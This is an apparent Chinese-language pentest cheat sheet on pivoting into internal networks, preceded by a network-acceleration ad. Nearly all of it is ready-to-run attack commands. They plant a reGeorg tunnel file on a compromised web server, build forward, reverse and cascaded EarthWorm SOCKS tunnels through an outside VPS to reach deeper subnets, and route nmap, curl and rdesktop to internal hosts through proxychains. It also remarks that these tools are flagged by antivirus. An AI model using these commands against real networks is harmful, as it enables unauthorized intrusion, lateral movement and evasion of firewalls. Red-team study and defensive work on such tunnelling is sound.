合规国际互联网加速 OSASE为企业客户提供高速稳定SD-WAN国际加速解决方案。 广告
[TOC] ## 代理工具 服务端 ~~~ reGeorg EW ~~~ 客户端 ~~~ proxychains proxifier 火狐代理插件 ~~~ ## 服务端 **reGeorg(HTTP/HTTPS协议)** • HTTP Service代理将所有流量转发到内网,常见的有reGeorg、tuna • reGeorg是reDuh的升级版,可以将内网服务器端口的数据通过http/https隧道转发到本机,但是reGeorg的通信特征明显,会被很多杀毒软件查杀 • 支持 ASPX、PHP、JSP等Web脚本 • 下载: https://github.com/sensepost/reGeorg **reGeorg 连接方法** • 边界机上:www目录下放置tunnel.nosocket.php文件,作为代理服务端 • 攻击机上:python reGeorgSocksProxy.py -u http://192.168.7.147/tunnel.nosocket.php -p 8888 **EarthWorm(socks5)** • Earthworm简称EW 是一套便携式的网络穿透工具,C语言编写,具有SOCKSv5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透 • 该工具能够以"正向"、"反向"、"多级级联"等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。支持 Linux、Windows、MacOS、Arm-Linux 均被包括其内,建议使用EW ## EW参数 **EW Earthworm (已经停止更新,被杀软列为病毒)** ``` 6种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran) ssocksd 正向代理 rcsock 反向代理客户端 rssocks 反向代理服务端 lcx_slave 一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机 lcx_tran 通过监听本地端口接收代理请求,并转发给代理提供主机 lcx_listen 通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机 ``` ## EW——1层连接 ~~~ 正向 • 将边界机作为代理服务器 • 边界机:ew_for_Win.exe -s ssocksd -l 8888 反向 • 攻击机:ew_for_Win.exe -s rcsocks -l 8888 -e 6666 • 边界机:ew_for_Win.exe -s rssocks -d 192.168.7.144 -e 6666 ~~~ ## EW——2层级联 ~~~ 正向 • 二级内网边界机:ew_for_Win.exe -s ssocksd -l 6666 • 一层内网边界机器:ew_for_Win.exe -s lcx_tran -l 8888 -f 192.168.11.14 -g 6666 反向 • 二级内网边界机:ew_for_Win.exe -s ssocksd -l 6666 • 外网的vps:ew_for_Win.exe -s lcx_listen -l 8888 -e 7777 • 一层内网边界机:ew_for_Win.exe -s lcx_slave -d 192.168.7.144 -e 7777 -f192.168.11.14 -g 6666 ~~~ ## 客户端 ~~~ proxychains • 攻击机客户端上配置:vim /etc/proxychains4.conf • 例1:proxychains4 curl http://192.168.11.12 • 例2:proxychains4 nmap -Pn -sT -n 192.168.11.12 -p 3389,80,139 • 例3:proxychains4 firefox • 例4:proxychains rdesktop 192.168.11.12 proxifier 火狐代理插件 ~~~